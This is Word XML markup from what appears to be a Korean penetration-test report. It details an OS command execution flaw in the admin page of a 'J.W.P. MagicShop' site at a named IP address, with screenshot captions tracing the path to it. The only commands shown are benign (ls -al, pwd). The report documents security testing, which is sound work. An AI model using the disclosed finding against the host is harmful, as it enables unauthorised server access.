        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>취약점진단</w:t>
      </w:r>
      <w:r w:rsidR="005D30D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 상세결과</w:t>
      </w:r>
      <w:bookmarkEnd w:id="240"/>
      <w:bookmarkEnd w:id="241"/>
    </w:p>
    <w:p w14:paraId="0ECC1E67" w14:textId="521C0A38" w:rsidR="00375F2C" w:rsidRDefault="00BE0459" w:rsidP="009A47E6">
      <w:pPr>
        <w:pStyle w:val="Level2TitleCtl2"/>
        <w:ind w:left="426" w:hanging="425"/>
      </w:pPr>
      <w:bookmarkStart w:id="242" w:name="_Toc206601964"/>
      <w:bookmarkStart w:id="243" w:name="_Toc209094553"/>
      <w:bookmarkStart w:id="244" w:name="OLE_LINK6"/>
      <w:bookmarkStart w:id="245" w:name="OLE_LINK5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.W.P. MagicShop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">웹 페이지 </w:t>
      </w:r>
      <w:r w:rsidR="009C3899">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="005633E8" w:rsidRPr="005633E8">
        <w:t>http://43.203.87.232</w:t>
      </w:r>
      <w:r w:rsidR="00375F2C">
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="242"/>
      <w:bookmarkEnd w:id="243"/>
    </w:p>
    <w:p w14:paraId="7E563113" w14:textId="24E05D87" w:rsidR="00367091" w:rsidRDefault="00367091" w:rsidP="00367091">
      <w:pPr>
        <w:pStyle w:val="Level3TitleCtl3"/>
      </w:pPr>
      <w:bookmarkStart w:id="246" w:name="_Toc206601965"/>
      <w:bookmarkStart w:id="247" w:name="_Toc209094554"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>운영체제 명령 실행</w:t>
      </w:r>
      <w:bookmarkEnd w:id="246"/>
      <w:bookmarkEnd w:id="247"/>
    </w:p>
    <w:p w14:paraId="52BD97CC" w14:textId="506A1421" w:rsidR="00093139" w:rsidRDefault="00172728" w:rsidP="00093139">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10931F6A" w14:textId="7A3A87F7" w:rsidR="00EC203F" w:rsidRDefault="00EF57BB" w:rsidP="00EC203F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF57BB">
        <w:t>사용자 입력값이 적절히 검증되지 않은 채로 운영체제의 시스템 명령어를 실행하는 함</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>수</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF57BB">
        <w:t>에 전달될 때 발생하는 취약점입니다. 공격자는 이 취약점을 이용해 임의의 명령어를 서버에서 실행시켜서 시스템 권한 탈취, 정보 유출 등 심각한 피해를 일으킬 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327F0A10" w14:textId="77777777" w:rsidR="00BF603D" w:rsidRDefault="00BF603D" w:rsidP="00EC203F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A53DC0" w14:textId="460562BF" w:rsidR="00172728" w:rsidRPr="00CB22A6" w:rsidRDefault="00172728" w:rsidP="00093139">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A2FBCD" w14:textId="612D8CC7" w:rsidR="00093139" w:rsidRPr="00CB22A6" w:rsidRDefault="00BE09B8" w:rsidP="00093139">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE09B8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>관리자</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE09B8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 페이지에서 서버 관리 기능을 통해 파라미터 기반 운영체제 명령어(ls -al, pwd 등) 실행이 가능한 취약점이 발견되었습니다. 이는 인증 우회뿐 아니라 시스템 명령을 통해 서버 권한 탈취로 이어질 수 있는 위험이 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A293C1" w14:textId="315F8F68" w:rsidR="00093139" w:rsidRDefault="00093139" w:rsidP="00093139">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A0D495F" w14:textId="1155E224" w:rsidR="001D52F9" w:rsidRPr="00CB22A6" w:rsidRDefault="00DC4AE6" w:rsidP="00093139">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251388928" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6ED5CD52" wp14:editId="6D5B06BC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4027170</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>617220</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="287867" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="17145" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="13" name="직사각형 13"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="287867"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CBB5" id="직사각형 13" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:317.1pt;margin-top:48.6pt;width:22.65pt;height:18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DRsQIAAJMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDchbdOomypKFYRU&#10;tRUt6tnx2tmVvB5jO9mEW3mHSrwBFw48FyrvwNj706hUHBA5bDyemW883/ycnm0rRTbCuhJ0RgcH&#10;KSVCc8hLvcrox9vFmzElzjOdMwVaZHQnHD2bvn51WpuJGEIBKheWIIh2k9pktPDeTJLE8UJUzB2A&#10;ERqVEmzFPIp2leSW1YheqWSYpkdJDTY3FrhwDm/PGyWdRnwpBfdXUjrhicoovs3Hr43fZfgm01M2&#10;WVlmipK3z2D/8IqKlRqD9lDnzDOytuUfUFXJLTiQ/oBDlYCUJRcxB8xmkD7L5qZgRsRckBxneprc&#10;/4Pll5trS8oca/eWEs0qrNHjt/vHL99//rj/9fWB4DVyVBs3QdMbc21byeExJLyVtgr/mArZRl53&#10;Pa9i6wnHy+H4eHx0TAlH1XA4Pkoj78mTs7HOvxNQkXDIqMWyRTbZ5sJ5DIimnUmIpWFRKhVLpzSp&#10;8e0n6WEaPRyoMg/aYOfsajlXlmwYVn+xSPEXkkG0PTOUlMbLkGKTVDz5nRIBQ+kPQiJBIY0mQmhN&#10;0cMyzoX2g0ZVsFw00Q73g3UeMXQEDMgSX9ljtwCdZQPSYTdvbu2Dq4id3Tu3qf/NufeIkUH73rkq&#10;NdiXMlOYVRu5se9IaqgJLC0h32H7WGjmyhm+KLGCF8z5a2ZxkHDkcDn4K/xIBVgpaE+UFGA/v3Qf&#10;7LG/UUtJjYOZUfdpzaygRL3X2Pkng9EoTHIURofHQxTsvma5r9Hrag5Y/QGuIcPjMdh71R2lheoO&#10;d8gsREUV0xxjZ5R72wlz3ywM3EJczGbRDKfXMH+hbwwP4IHV0KG32ztmTdvGHvv/ErohZpNn3dzY&#10;Bk8Ns7UHWcZWf+K15RsnPzZOu6XCatmXo9XTLp3+BgAA//8DAFBLAwQUAAYACAAAACEAI+9KYeAA&#10;AAAKAQAADwAAAGRycy9kb3ducmV2LnhtbEyPy07DMBBF90j8gzVI7KiDA0kb4lSAhBAVC2jL3o2n&#10;SVQ/othNwt8zrGA1Gs3RnXPL9WwNG3EInXcSbhcJMHS1151rJOx3LzdLYCEqp5XxDiV8Y4B1dXlR&#10;qkL7yX3iuI0NoxAXCiWhjbEvOA91i1aFhe/R0e3oB6sirUPD9aAmCreGiyTJuFWdow+t6vG5xfq0&#10;PVsJH/505OZLiE3+9CryN7ucmvFdyuur+fEBWMQ5/sHwq0/qUJHTwZ+dDsxIyNI7QaiEVU6TgCxf&#10;3QM7EJmmAnhV8v8Vqh8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAA&#10;CwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAcPXQ0bECAACTBQAA&#10;DgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAI+9KYeAAAAAK&#10;AQAADwAAAAAAAAAAAAAAAAALBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAABgGAAAA&#10;AA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="003E4C09">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26D13015" wp14:editId="581E5973">
            <wp:extent cx="4572000" cy="1810667"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="1841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04" b="30930"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1810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B3A5F" w14:textId="7D3D010F" w:rsidR="00093139" w:rsidRDefault="00093139" w:rsidP="00093139">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="248" w:name="_Toc206630347"/>
      <w:bookmarkStart w:id="249" w:name="_Toc206630485"/>
      <w:bookmarkStart w:id="250" w:name="_Toc20909457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w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DC4AE6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">메인에서 </w:t>
      </w:r>
      <w:r w:rsidR="00DC4AE6">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00DC4AE6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>쿠폰</w:t>
      </w:r>
      <w:r w:rsidR="00DC4AE6">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00DC4AE6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="248"/>
      <w:bookmarkEnd w:id="249"/>
      <w:bookmarkEnd w:id="250"/>
    </w:p>
    <w:p w14:paraId="6ACAFE2A" w14:textId="67FA2B59" w:rsidR="00093139" w:rsidRPr="00CB22A6" w:rsidRDefault="00093139" w:rsidP="00093139">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08857F2E" w14:textId="7F5E6DF8" w:rsidR="00093139" w:rsidRDefault="0049697C" w:rsidP="00093139">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251399168" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7DC06BA6" wp14:editId="1F5A740F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1378585</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1571837</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="728134" cy="237067"/>
                <wp:effectExtent l="0" t="0" r="15240" b="10795"/>
                <wp:wrapNone/>
                <wp:docPr id="17" name="직사각형 1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47038" id="직사각형 17" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:108.55pt;margin-top:123.75pt;width:57.35pt;height:18.6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1RssQIAAJMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdDdp2rRRN1XUKgip&#10;aiNa1LPjtbMreT3GdrIJt/IOSLwBFw48FyrvwNj706hUHBA5bDyeb77x/J6dbytFNsK6EnRGBwcp&#10;JUJzyEu9yuiHu/mbE0qcZzpnCrTI6E44ej59/eqsNhMxhAJULixBEu0mtclo4b2ZJInjhaiYOwAj&#10;NCol2Ip5FO0qyS2rkb1SyTBNj5MabG4scOEc3l42SjqN/FIK7m+kdMITlVF8m49fG7/L8E2mZ2yy&#10;sswUJW+fwf7hFRUrNTrtqS6ZZ2Rtyz+oqpJbcCD9AYcqASlLLmIMGM0gfRbNbcGMiLFgcpzp0+T+&#10;Hy2/3iwsKXOs3ZgSzSqs0eO3h8fP33/+ePj19QvBa8xRbdwEobdmYVvJ4TEEvJW2Cv8YCtnGvO76&#10;vIqtJxwvx8OTweGIEo6q4eE4PY6cyZOxsc6/FVCRcMioxbLFbLLNlfPoEKEdJPjSMC+ViqVTmtT4&#10;9tP0KI0WDlSZB23AObtaXihLNgyrP5+n+AvBINseDCWl8TKE2AQVT36nROBQ+r2QmCAMY9h4CK0p&#10;elrGudB+0KgKlovG29G+s84iuo6EgVniK3vulqBDNiQdd/PmFh9MRezs3rgN/W/GvUX0DNr3xlWp&#10;wb4UmcKoWs8NvktSk5qQpSXkO2wfC81cOcPnJVbwijm/YBYHCUcOl4O/wY9UgJWC9kRJAfbTS/cB&#10;j/2NWkpqHMyMuo9rZgUl6p3Gzj8djEZhkqMwOhoPUbD7muW+Rq+rC8DqD3ANGR6PAe9Vd5QWqnvc&#10;IbPgFVVMc/SdUe5tJ1z4ZmHgFuJiNoswnF7D/JW+NTyQh6yGDr3b3jNr2jb22P/X0A0xmzzr5gYb&#10;LDXM1h5kGVv9Ka9tvnHyY+O0Wyqsln05op526fQ3AAAA//8DAFBLAwQUAAYACAAAACEAJzdKY+AA&#10;AAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQU/DMAyF70j8h8hI3FjabNCqNJ0ACSEQBxhwzxqv&#10;rdY4VZO15d9jTnCz/Z6ev1duF9eLCcfQedKQrhIQSLW3HTUaPj8er3IQIRqypveEGr4xwLY6PytN&#10;Yf1M7zjtYiM4hEJhNLQxDoWUoW7RmbDyAxJrBz86E3kdG2lHM3O466VKkhvpTEf8oTUDPrRYH3cn&#10;p+HNHw+y/1LqJbt/Utmzy+dmetX68mK5uwURcYl/ZvjFZ3SomGnvT2SD6DWoNEvZysMmuwbBjvU6&#10;5TJ7vuSbHGRVyv8dqh8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAA&#10;CwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA1hdUbLECAACTBQAA&#10;DgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAJzdKY+AAAAAL&#10;AQAADwAAAAAAAAAAAAAAAAALBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAABgGAAAA&#10;AA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006C3333">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64ADCCE3" wp14:editId="6C2330C6">
            <wp:extent cx="4571187" cy="2192232"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="177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737"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="21926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E427CB" w14:textId="693EF599" w:rsidR="00DE3B69" w:rsidRDefault="00093139" w:rsidP="00DE3B69">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="251" w:name="_Toc206630348"/>
      <w:bookmarkStart w:id="252" w:name="_Toc206630486"/>
      <w:bookmarkStart w:id="253" w:name="_Toc20909457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w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0049697C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">쿠폰 목록에서 </w:t>
      </w:r>
      <w:r w:rsidR="0049697C">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="0049697C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>페이지 소스 보기</w:t>
      </w:r>
      <w:r w:rsidR="0049697C">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="0049697C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클릭</w:t>
      </w:r>
      <w:bookmarkEnd w:id="251"/>
      <w:bookmarkEnd w:id="252"/>
      <w:bookmarkEnd w:id="253"/>
    </w:p>
    <w:p w14:paraId="74BD4495" w14:textId="77777777" w:rsidR="00DE3B69" w:rsidRDefault="00DE3B69" w:rsidP="00DE3B69">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A2FE492" w14:textId="1CA59728" w:rsidR="00DE3B69" w:rsidRDefault="001C0AFC" w:rsidP="00DE3B69">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="254" w:name="_Toc206630349"/>
      <w:bookmarkStart w:id="255" w:name="_Toc206630487"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251631616" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1CE5037E" wp14:editId="1D130728">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1953260</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1393190</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1117600" cy="120650"/>
                <wp:effectExtent l="0" t="0" r="25400" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="45" name="직사각형 45"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="111760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E2A59" id="직사각형 45" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:153.8pt;margin-top:109.7pt;width:88pt;height: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rdsAIAAJQFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdHejpKVRN1XUKgip&#10;aita1LPjtbMreT3GdrIJt/IOSH0DLhx4LlTegbH3p1GpOCBy2Hg8M994vvk5Od3WimyEdRXonGYH&#10;KSVCcygqvcrpx9vFm7eUOM90wRRokdOdcPR09vrVSWOmYgQlqEJYgiDaTRuT09J7M00Sx0tRM3cA&#10;RmhUSrA18yjaVVJY1iB6rZJRmh4mDdjCWODCObw9b5V0FvGlFNxfSemEJyqn+DYfvzZ+l+GbzE7Y&#10;dGWZKSvePYP9wytqVmkMOkCdM8/I2lZ/QNUVt+BA+gMOdQJSVlzEHDCbLH2WzU3JjIi5IDnODDS5&#10;/wfLLzfXllRFTscTSjSrsUaP3+4fv3z/+eP+18NXgtfIUWPcFE1vzLXtJIfHkPBW2jr8YypkG3nd&#10;DbyKrSccL7MsOzpMkX6OumyUHk4i8cmTt7HOvxNQk3DIqcW6RTrZ5sJ5jIimvUkIpmFRKRVrpzRp&#10;EPQ4RcygcqCqImijYFfLM2XJhmH5F4sUfyEbRNszQ0lpvAw5tlnFk98pETCU/iAkMoR5jNoIoTfF&#10;AMs4F9pnrapkhWijTfaD9R4xdAQMyBJfOWB3AL1lC9Jjt2/u7IOriK09OHep/8158IiRQfvBua40&#10;2JcyU5hVF7m170lqqQksLaHYYf9YaAfLGb6osIIXzPlrZnGSsOi4HfwVfqQCrBR0J0pKsJ9fug/2&#10;2OCopaTBycyp+7RmVlCi3mts/eNsPA6jHIXx5GiEgt3XLPc1el2fAVY/wz1keDwGe6/6o7RQ3+ES&#10;mYeoqGKaY+yccm974cy3GwPXEBfzeTTD8TXMX+gbwwN4YDV06O32jlnTtbHHAbiEforZ9Fk3t7bB&#10;U8N87UFWsdWfeO34xtGPjdOtqbBb9uVo9bRMZ78BAAD//wMAUEsDBBQABgAIAAAAIQCCrVyB4AAA&#10;AAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwDIbvSLxDZCRuLF1araU0nQAJIdAOMOCeNVlb&#10;LXGqJmvL22NOcPTvT78/V9vFWTaZMfQeJaxXCTCDjdc9thI+P55uCmAhKtTKejQSvk2AbX15UalS&#10;+xnfzbSPLaMSDKWS0MU4lJyHpjNOhZUfDNLu6EenIo1jy/WoZip3losk2XCneqQLnRrMY2ea0/7s&#10;JLz505HbLyFe84dnkb+4Ym6nnZTXV8v9HbBolvgHw68+qUNNTgd/Rh2YlZAm+YZQCWJ9mwEjIitS&#10;Sg6UpEUGvK74/x/qHwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAAL&#10;AAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCnevrdsAIAAJQFAAAO&#10;AAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCCrVyB4AAAAAsB&#10;AAAPAAAAAAAAAAAAAAAAAAoFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAFwYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:bookmarkEnd w:id="254"/>
      <w:bookmarkEnd w:id="255"/>
    </w:p>
    <w:p w14:paraId="68B9C450" w14:textId="0183CE12" w:rsidR="00E72D99" w:rsidRPr="00E72D99" w:rsidRDefault="00E72D99" w:rsidP="00E72D99">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="02B03FFF" wp14:editId="7E063A4E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2217074</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1531735</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1253836" cy="152400"/>
                <wp:effectExtent l="0" t="0" r="22860" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="6" name="직사각형 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1253836"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C33F3" id="직사각형 6" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:174.55pt;margin-top:120.6pt;width:98.7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vQsAIAAJIFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdHfTpLRRN1XUKgip&#10;KhUt6tnx2tmVvB5jO9mEW3kHJN6ACweeC5V3YOz9aVQqDogcHM/OzDeeb35Oz7a1IhthXQU6p9lB&#10;SonQHIpKr3L64Xbx6pgS55kumAItcroTjp7NXr44bcxUjKAEVQhLEES7aWNyWnpvpknieClq5g7A&#10;CI1KCbZmHkW7SgrLGkSvVTJK06OkAVsYC1w4h18vWiWdRXwpBffvpHTCE5VTfJuPp43nMpzJ7JRN&#10;V5aZsuLdM9g/vKJmlcagA9QF84ysbfUHVF1xCw6kP+BQJyBlxUXMAbPJ0ifZ3JTMiJgLkuPMQJP7&#10;f7D8anNtSVXk9IgSzWos0cO3+4fP33/+uP/19Qs5Cgw1xk3R8MZc205yeA3pbqWtwz8mQraR1d3A&#10;qth6wvFjNpocHh8iPEddNhmN00h78uhtrPNvBNQkXHJqsWqRTLa5dB4jomlvEoJpWFRKxcopTRoE&#10;PUknafRwoKoiaIOds6vlubJkw7D4i0WKv5ANou2ZoaQ0fgw5tlnFm98pETCUfi8k8oN5jNoIoTPF&#10;AMs4F9pnrapkhWijTfaD9R4xdAQMyBJfOWB3AL1lC9Jjt2/u7IOriI09OHep/8158IiRQfvBua40&#10;2OcyU5hVF7m170lqqQksLaHYYfdYaMfKGb6osIKXzPlrZnGOcOJwN/h3eEgFWCnobpSUYD899z3Y&#10;Y3ujlpIG5zKn7uOaWUGJequx8U+y8TgMchTGk9cjFOy+Zrmv0ev6HLD6GW4hw+M12HvVX6WF+g5X&#10;yDxERRXTHGPnlHvbC+e+3Re4hLiYz6MZDq9h/lLfGB7AA6uhQ2+3d8yaro09DsAV9DPMpk+6ubUN&#10;nhrmaw+yiq3+yGvHNw5+bJxuSYXNsi9Hq8dVOvsNAAD//wMAUEsDBBQABgAIAAAAIQB7XHF74AAA&#10;AAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwDIbvSLxDZCRuLG3oulGaToCEEIgDjO2eNV5b&#10;LXGqJmvL2xNOcLT96ff3l5vZGjbi4DtHEtJFAgypdrqjRsLu6/lmDcwHRVoZRyjhGz1sqsuLUhXa&#10;TfSJ4zY0LIaQL5SENoS+4NzXLVrlF65HirejG6wKcRwargc1xXBruEiSnFvVUfzQqh6fWqxP27OV&#10;8OFOR272QrytHl/E6tWup2Z8l/L6an64BxZwDn8w/OpHdaii08GdSXtmJNxmd2lEJYgsFcAisczy&#10;HNghbvKlAF6V/H+H6gcAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNd